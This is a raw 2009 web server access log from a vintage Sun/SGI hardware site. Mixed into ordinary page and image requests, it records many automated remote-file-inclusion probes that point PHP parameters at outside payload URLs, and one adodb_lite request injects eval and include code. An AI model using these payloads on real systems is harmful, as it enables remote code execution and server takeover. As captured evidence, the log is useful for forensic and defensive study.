151.68.234.207 - - [07/Jun/2009:05:55:15 -0400] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 262
203.209.252.21 - - [07/Jun/2009:05:55:41 -0400] "GET /sun_ipx/sparc_leds/ HTTP/1.0" 304 -
90.195.32.70 - - [07/Jun/2009:05:55:59 -0400] "GET /sun_ss5/ HTTP/1.1" 200 14917
90.195.32.70 - - [07/Jun/2009:05:55:59 -0400] "GET /sun_ss5/ss5_1.jpg HTTP/1.1" 200 14675
90.195.32.70 - - [07/Jun/2009:05:55:59 -0400] "GET /sun_ss5/pdf.gif HTTP/1.1" 200 390
90.195.32.70 - - [07/Jun/2009:05:55:59 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 200 51920
90.195.32.70 - - [07/Jun/2009:05:55:59 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
90.195.32.70 - - [07/Jun/2009:05:55:59 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 200 58136
65.55.51.111 - - [07/Jun/2009:05:55:59 -0400] "GET /robots.txt HTTP/1.1" 404 216
90.195.32.70 - - [07/Jun/2009:05:55:59 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 200 39884
90.195.32.70 - - [07/Jun/2009:05:56:00 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 200 29609
90.195.32.70 - - [07/Jun/2009:05:56:00 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 74139
90.195.32.70 - - [07/Jun/2009:05:56:00 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 35426
90.195.32.70 - - [07/Jun/2009:05:56:24 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 206 21565
90.195.32.70 - - [07/Jun/2009:05:56:25 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 206 39461
90.195.32.70 - - [07/Jun/2009:05:56:25 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 206 24129
90.195.32.70 - - [07/Jun/2009:05:56:25 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 42643
90.195.32.70 - - [07/Jun/2009:05:56:25 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 206 18965
90.195.32.70 - - [07/Jun/2009:05:56:25 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 206 18234
90.195.32.70 - - [07/Jun/2009:05:56:26 -0400] "GET /favicon.ico HTTP/1.1" 200 318
217.147.29.190 - - [07/Jun/2009:05:56:59 -0400] "GET /logs/access_log/?_zb_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 222
217.147.29.190 - - [07/Jun/2009:05:57:00 -0400] "GET /?_zb_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 200 12547
217.147.29.190 - - [07/Jun/2009:05:57:00 -0400] "GET /logs/?_zb_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 200 2287
93.158.146.243 - - [07/Jun/2009:05:59:10 -0400] "GET /robots.txt HTTP/1.1" 404 216
93.158.146.243 - - [07/Jun/2009:05:59:10 -0400] "GET /~strabal/creations/new2.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:12 -0400] "GET /sunFAQ/faq_m68k/redball.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:14 -0400] "GET /icons/blank.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:16 -0400] "GET /icons/back.gif HTTP/1.1" 304 -
66.232.119.212 - - [07/Jun/2009:05:59:18 -0400] "GET /logs/access_log///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 250
66.232.119.212 - - [07/Jun/2009:05:59:18 -0400] "GET /logs///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239
66.232.119.212 - - [07/Jun/2009:05:59:18 -0400] "GET ///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234
93.158.146.243 - - [07/Jun/2009:05:59:18 -0400] "GET /sunFAQ/faq_m68k/bigred.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:21 -0400] "GET /sunFAQ/faq_vme/ba2.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:23 -0400] "GET /sunFAQ/faq_vme/redblk.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:25 -0400] "GET /icons/image2.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:27 -0400] "GET /sunFAQ/faq_m68k/index.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:29 -0400] "GET /sun3/images/slidebar.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:31 -0400] "GET /icons/layout.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:33 -0400] "GET /sunFAQ/faq_m68k/model.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:35 -0400] "GET /sunFAQ/faq_m68k/blueball.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:38 -0400] "GET /icons/apache_pb.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:40 -0400] "GET /apache/manual/images/index.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:42 -0400] "GET /sunFAQ/faq_m68k/redblk.gif HTTP/1.1" 304 -
93.158.146.243 - - [07/Jun/2009:05:59:44 -0400] "GET /apache/manual/images/home.gif HTTP/1.1" 304 -
87.209.64.9 - - [07/Jun/2009:06:00:11 -0400] "GET /sgi_indy/ HTTP/1.1" 200 6745
87.209.64.9 - - [07/Jun/2009:06:00:11 -0400] "GET /sgi_indy/indy_monitor.jpg HTTP/1.1" 200 12805
87.209.64.9 - - [07/Jun/2009:06:00:11 -0400] "GET /sgi_indy/indy_inside.jpg HTTP/1.1" 200 23285
87.209.64.9 - - [07/Jun/2009:06:00:11 -0400] "GET /sgi_indy/indy_graphics.jpg HTTP/1.1" 200 16915
87.209.64.9 - - [07/Jun/2009:06:00:11 -0400] "GET /sgi_indy/indy_hd.jpg HTTP/1.1" 200 17475
87.209.64.9 - - [07/Jun/2009:06:00:11 -0400] "GET /sgi_indy/indy_rear.jpg HTTP/1.1" 200 24773
87.209.64.9 - - [07/Jun/2009:06:00:12 -0400] "GET /sgi_indy/hotbox.jpg HTTP/1.1" 200 90395
87.209.64.9 - - [07/Jun/2009:06:00:12 -0400] "GET /favicon.ico HTTP/1.1" 200 318
74.202.111.66 - - [07/Jun/2009:06:00:56 -0400] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://salam2.ucoz.com/vid.txt??? HTTP/1.1" 404 228
74.202.111.66 - - [07/Jun/2009:06:00:56 -0400] "GET /upgrade_album.php?GALLERY_BASEDIR=http://salam2.ucoz.com/vid.txt??? HTTP/1.1" 404 223
74.202.111.66 - - [07/Jun/2009:06:00:56 -0400] "GET /logs/access_log/upgrade_album.php?GALLERY_BASEDIR=http://salam2.ucoz.com/vid.txt??? HTTP/1.1" 404 239
87.230.76.224 - - [07/Jun/2009:06:02:25 -0400] "GET ///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234
87.230.76.224 - - [07/Jun/2009:06:02:28 -0400] "GET /logs///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239
87.230.76.224 - - [07/Jun/2009:06:02:28 -0400] "GET /logs/access_log///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 250
66.232.119.212 - - [07/Jun/2009:06:02:44 -0400] "GET /logs/access_log%20%20///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 252
89.248.160.241 - - [07/Jun/2009:06:03:00 -0400] "POST /conf/conf.cgi HTTP/1.1" 404 219
87.230.76.224 - - [07/Jun/2009:06:03:10 -0400] "GET /logs///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239
87.230.76.224 - - [07/Jun/2009:06:03:10 -0400] "GET ///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234
87.230.76.224 - - [07/Jun/2009:06:03:11 -0400] "GET /logs/access_log///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 250
124.115.0.22 - - [07/Jun/2009:06:03:35 -0400] "GET /dec/multia/ HTTP/1.1" 200 10529
88.131.106.1 - - [07/Jun/2009:06:06:04 -0400] "GET /robots.txt HTTP/1.0" 404 204
88.131.106.1 - - [07/Jun/2009:06:06:04 -0400] "GET /personal/links.html HTTP/1.0" 200 3613
66.249.71.67 - - [07/Jun/2009:06:10:25 -0400] "GET /sunFAQ/mouse_upgrade.html HTTP/1.1" 304 -
61.73.244.41 - - [07/Jun/2009:06:10:43 -0400] "GET /logs/access_log.4 HTTP/1.1" 200 322391
41.210.252.11 - - [07/Jun/2009:06:10:57 -0400] "GET /logs/referer_log.1 HTTP/1.1" 200 302376
72.30.142.225 - - [07/Jun/2009:06:13:20 -0400] "GET /logs/?M=D HTTP/1.0" 200 2275
87.230.76.224 - - [07/Jun/2009:06:13:44 -0400] "GET /logs/access_log%20%20///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 252
61.135.249.213 - - [07/Jun/2009:06:13:54 -0400] "GET /sgi_indy/ HTTP/1.1" 200 6745
87.230.76.224 - - [07/Jun/2009:06:14:06 -0400] "GET /logs/access_log%20%20///include/print_category.php?dir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 252
89.248.160.241 - - [07/Jun/2009:06:16:54 -0400] "POST /conf/conf.cgi HTTP/1.1" 404 219
217.147.29.190 - - [07/Jun/2009:06:21:40 -0400] "GET /sunFAQ//skin/board/default/doctype.php?dir=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 244
217.147.29.190 - - [07/Jun/2009:06:21:40 -0400] "GET //skin/board/default/doctype.php?dir=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 237
217.147.29.190 - - [07/Jun/2009:06:21:40 -0400] "GET /sunFAQ/faq_hardware//skin/board/default/doctype.php?dir=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 257
217.147.29.190 - - [07/Jun/2009:06:21:40 -0400] "GET /sunFAQ/faq_hardware/hwref4.html//skin/board/default/doctype.php?dir=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 269
75.145.152.113 - - [07/Jun/2009:06:21:47 -0400] "GET //include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 232
75.145.152.113 - - [07/Jun/2009:06:21:47 -0400] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 248
75.145.152.113 - - [07/Jun/2009:06:21:47 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 237
89.133.224.131 - - [07/Jun/2009:06:23:00 -0400] "GET /sgi_indy/ HTTP/1.1" 200 6745
89.133.224.131 - - [07/Jun/2009:06:23:01 -0400] "GET /sgi_indy/indy_monitor.jpg HTTP/1.1" 200 12805
89.133.224.131 - - [07/Jun/2009:06:23:01 -0400] "GET /sgi_indy/indy_inside.jpg HTTP/1.1" 200 23285
89.133.224.131 - - [07/Jun/2009:06:23:01 -0400] "GET /sgi_indy/indy_graphics.jpg HTTP/1.1" 200 16915
89.133.224.131 - - [07/Jun/2009:06:23:01 -0400] "GET /sgi_indy/indy_hd.jpg HTTP/1.1" 200 17475
89.133.224.131 - - [07/Jun/2009:06:23:01 -0400] "GET /sgi_indy/indy_rear.jpg HTTP/1.1" 200 24773
89.133.224.131 - - [07/Jun/2009:06:23:01 -0400] "GET /sgi_indy/hotbox.jpg HTTP/1.1" 200 90395
89.133.224.131 - - [07/Jun/2009:06:23:01 -0400] "GET /favicon.ico HTTP/1.1" 200 318
75.145.152.113 - - [07/Jun/2009:06:23:47 -0400] "GET /logs/access_log%20%20//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 250
76.28.65.80 - - [07/Jun/2009:06:25:05 -0400] "GET /sun_ss5/ HTTP/1.1" 200 14917
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/ss5_1.jpg HTTP/1.1" 200 14675
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/pdf.gif HTTP/1.1" 200 390
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/ss5_int.jpg HTTP/1.1" 200 58136
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/ss5_jumpers.jpg HTTP/1.1" 200 39884
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss20/floppy.jpg HTTP/1.1" 200 12433
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/ss5_server.jpg HTTP/1.1" 200 51920
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/ss5_rear.jpg HTTP/1.1" 200 42643
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/ss5-newfan.jpg HTTP/1.1" 200 74139
76.28.65.80 - - [07/Jun/2009:06:25:06 -0400] "GET /sun_ss5/ss5-newfan2.jpg HTTP/1.1" 200 29609
76.28.65.80 - - [07/Jun/2009:06:25:10 -0400] "GET /favicon.ico HTTP/1.1" 200 318
65.55.106.235 - - [07/Jun/2009:06:26:02 -0400] "GET /docs/rhl-rg-6.1en/s1-intro-more-to-come.html HTTP/1.1" 304 -
65.55.106.235 - - [07/Jun/2009:06:26:03 -0400] "GET /~strabal/lucypics/main.html HTTP/1.1" 304 -
163.20.116.193 - - [07/Jun/2009:06:26:04 -0400] "GET /logs/access_log.3//skin/board/default/doctype.php?dir=http://bvusolutions.com/projeckts/misc/rapid/fx29id.txt?? HTTP/1.1" 404 255
163.20.116.193 - - [07/Jun/2009:06:26:04 -0400] "GET /logs//skin/board/default/doctype.php?dir=http://bvusolutions.com/projeckts/misc/rapid/fx29id.txt?? HTTP/1.1" 404 242
163.20.116.193 - - [07/Jun/2009:06:26:04 -0400] "GET //skin/board/default/doctype.php?dir=http://bvusolutions.com/projeckts/misc/rapid/fx29id.txt?? HTTP/1.1" 404 237
218.234.23.56 - - [07/Jun/2009:06:26:18 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 232
218.234.23.56 - - [07/Jun/2009:06:26:18 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 237
218.234.23.56 - - [07/Jun/2009:06:26:18 -0400] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 248
163.20.116.193 - - [07/Jun/2009:06:26:24 -0400] "GET /logs/access_log.3%20%20//skin/board/default/doctype.php?dir=http://bvusolutions.com/projeckts/misc/rapid/fx29id.txt?? HTTP/1.1" 404 257
217.147.29.190 - - [07/Jun/2009:06:26:31 -0400] "GET /sunFAQ/faq_hardware/hwref1.html//skin/board/default/doctype.php?dir=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 269
211.189.18.73 - - [07/Jun/2009:06:26:54 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 237
211.189.18.73 - - [07/Jun/2009:06:26:54 -0400] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 248
211.189.18.73 - - [07/Jun/2009:06:26:54 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 232
211.189.18.73 - - [07/Jun/2009:06:26:55 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 232
211.189.18.73 - - [07/Jun/2009:06:26:55 -0400] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 248
211.189.18.73 - - [07/Jun/2009:06:26:55 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 237
211.189.18.73 - - [07/Jun/2009:06:26:55 -0400] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 248
211.189.18.73 - - [07/Jun/2009:06:26:55 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 237
211.189.18.73 - - [07/Jun/2009:06:26:55 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.prestigesrentals06.com//myPHPCalendar/fx29id1.txt??? HTTP/1.1" 404 232
121.165.73.157 - - [07/Jun/2009:06:27:10 -0400] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 282
121.165.73.157 - - [07/Jun/2009:06:27:10 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 287
195.22.11.158 - - [07/Jun/2009:06:27:25 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235
195.22.11.158 - - [07/Jun/2009:06:27:25 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240
193.47.80.77 - - [07/Jun/2009:06:28:01 -0400] "GET /sunPICS/sparc20/sparc_4.jpg HTTP/1.0" 200 25101
195.22.11.158 - - [07/Jun/2009:06:28:35 -0400] "GET /logs/access_log%20%20//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 253
59.92.62.99 - - [07/Jun/2009:06:28:49 -0400] "GET /favicon.ico HTTP/1.1" 200 318
195.22.11.158 - - [07/Jun/2009:06:29:08 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235
195.22.11.158 - - [07/Jun/2009:06:29:08 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240
195.22.11.158 - - [07/Jun/2009:06:30:11 -0400] "GET /logs/access_log%20%20//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 253
65.55.208.161 - - [07/Jun/2009:06:30:14 -0400] "GET /logs/access_log.4 HTTP/1.1" 200 1090996
65.98.59.178 - - [07/Jun/2009:06:30:15 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235
65.98.59.178 - - [07/Jun/2009:06:30:15 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 240
195.22.11.158 - - [07/Jun/2009:06:30:16 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235
195.22.11.158 - - [07/Jun/2009:06:30:16 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240
65.98.59.178 - - [07/Jun/2009:06:30:28 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235
65.98.59.178 - - [07/Jun/2009:06:30:28 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 240
89.248.160.241 - - [07/Jun/2009:06:30:37 -0400] "POST /conf/conf.cgi HTTP/1.1" 404 219
65.98.59.178 - - [07/Jun/2009:06:31:00 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235
65.98.59.178 - - [07/Jun/2009:06:31:00 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 240
65.98.59.178 - - [07/Jun/2009:06:31:04 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235
65.98.59.178 - - [07/Jun/2009:06:31:04 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 240
65.98.59.178 - - [07/Jun/2009:06:31:31 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235
65.98.59.178 - - [07/Jun/2009:06:31:31 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 240
195.22.11.158 - - [07/Jun/2009:06:31:31 -0400] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 251
65.98.59.178 - - [07/Jun/2009:06:31:37 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235
65.98.59.178 - - [07/Jun/2009:06:31:37 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 240
121.165.73.157 - - [07/Jun/2009:06:31:45 -0400] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 282
121.165.73.157 - - [07/Jun/2009:06:31:45 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 287
65.98.59.178 - - [07/Jun/2009:06:31:56 -0400] "GET /logs/access_log%20%20//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 253
65.98.59.178 - - [07/Jun/2009:06:32:10 -0400] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 251
65.98.59.178 - - [07/Jun/2009:06:32:14 -0400] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 251
65.98.59.178 - - [07/Jun/2009:06:32:15 -0400] "GET /logs/access_log%20%20//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 253
72.30.142.225 - - [07/Jun/2009:06:32:18 -0400] "GET /sun_ipx/webserver.html HTTP/1.0" 304 -
80.91.90.152 - - [07/Jun/2009:06:32:25 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.eyepro.net//assets/images/_MD.TXT??? HTTP/1.1" 404 250
80.91.90.152 - - [07/Jun/2009:06:32:25 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.eyepro.net//assets/images/_MD.TXT??? HTTP/1.1" 404 255
195.22.11.158 - - [07/Jun/2009:06:32:30 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235
195.22.11.158 - - [07/Jun/2009:06:32:30 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240
77.221.130.2 - - [07/Jun/2009:06:32:33 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 279
77.221.130.2 - - [07/Jun/2009:06:32:38 -0400] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 295
77.221.130.2 - - [07/Jun/2009:06:32:38 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 284
65.98.59.178 - - [07/Jun/2009:06:32:42 -0400] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 251
65.98.59.178 - - [07/Jun/2009:06:32:47 -0400] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 251
65.55.104.156 - - [07/Jun/2009:06:33:00 -0400] "GET /sun_ipx/sparc_leds/ HTTP/1.1" 200 9595
124.0.73.2 - - [07/Jun/2009:06:33:08 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240
195.22.11.158 - - [07/Jun/2009:06:33:22 -0400] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 251
83.145.227.94 - - [07/Jun/2009:06:33:23 -0400] "GET /sunFAQ/faq_nvram.html HTTP/1.1" 200 69181
83.145.227.94 - - [07/Jun/2009:06:33:24 -0400] "GET /sun_ss2/ HTTP/1.1" 200 9016
83.145.227.94 - - [07/Jun/2009:06:33:24 -0400] "GET /sunFAQ/sun-nvram.gif HTTP/1.1" 200 23578
83.145.227.94 - - [07/Jun/2009:06:33:24 -0400] "GET /sun_ss2/ss2_4.jpg HTTP/1.1" 200 15434
83.145.227.94 - - [07/Jun/2009:06:33:24 -0400] "GET /sun_ss2/ss2_3.jpg HTTP/1.1" 200 21867
83.145.227.94 - - [07/Jun/2009:06:33:25 -0400] "GET /sun_ss2/sun4_75.gif HTTP/1.1" 200 5693
83.145.227.94 - - [07/Jun/2009:06:33:25 -0400] "GET /sun_ss2/ss2_2.jpg HTTP/1.1" 200 8199
83.145.227.94 - - [07/Jun/2009:06:33:25 -0400] "GET /sun_ss2/ss2_5.jpg HTTP/1.1" 200 31262
83.145.227.94 - - [07/Jun/2009:06:33:25 -0400] "GET /sun_ss2/ss2_5.jpg HTTP/1.1" 200 31262
83.145.227.94 - - [07/Jun/2009:06:33:25 -0400] "GET /favicon.ico HTTP/1.1" 200 318
112.137.162.219 - - [07/Jun/2009:06:33:36 -0400] "-" 408 -
112.137.162.219 - - [07/Jun/2009:06:33:36 -0400] "-" 408 -
112.137.162.219 - - [07/Jun/2009:06:33:39 -0400] "-" 408 -
66.175.122.228 - - [07/Jun/2009:06:34:05 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 240
66.175.122.228 - - [07/Jun/2009:06:34:05 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 235
65.55.107.182 - - [07/Jun/2009:06:34:15 -0400] "GET /sunFAQ/serial/index.html HTTP/1.1" 304 -
66.249.71.67 - - [07/Jun/2009:06:34:24 -0400] "GET /sunPICS/ HTTP/1.1" 200 17863
124.0.73.2 - - [07/Jun/2009:06:34:27 -0400] "GET /logs/access_log%20%20//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 253
121.165.73.157 - - [07/Jun/2009:06:34:44 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 240
121.165.73.157 - - [07/Jun/2009:06:34:45 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 235
124.0.73.2 - - [07/Jun/2009:06:34:59 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235
124.0.73.2 - - [07/Jun/2009:06:34:59 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240
65.98.59.178 - - [07/Jun/2009:06:35:15 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 240
65.98.59.178 - - [07/Jun/2009:06:35:15 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 235
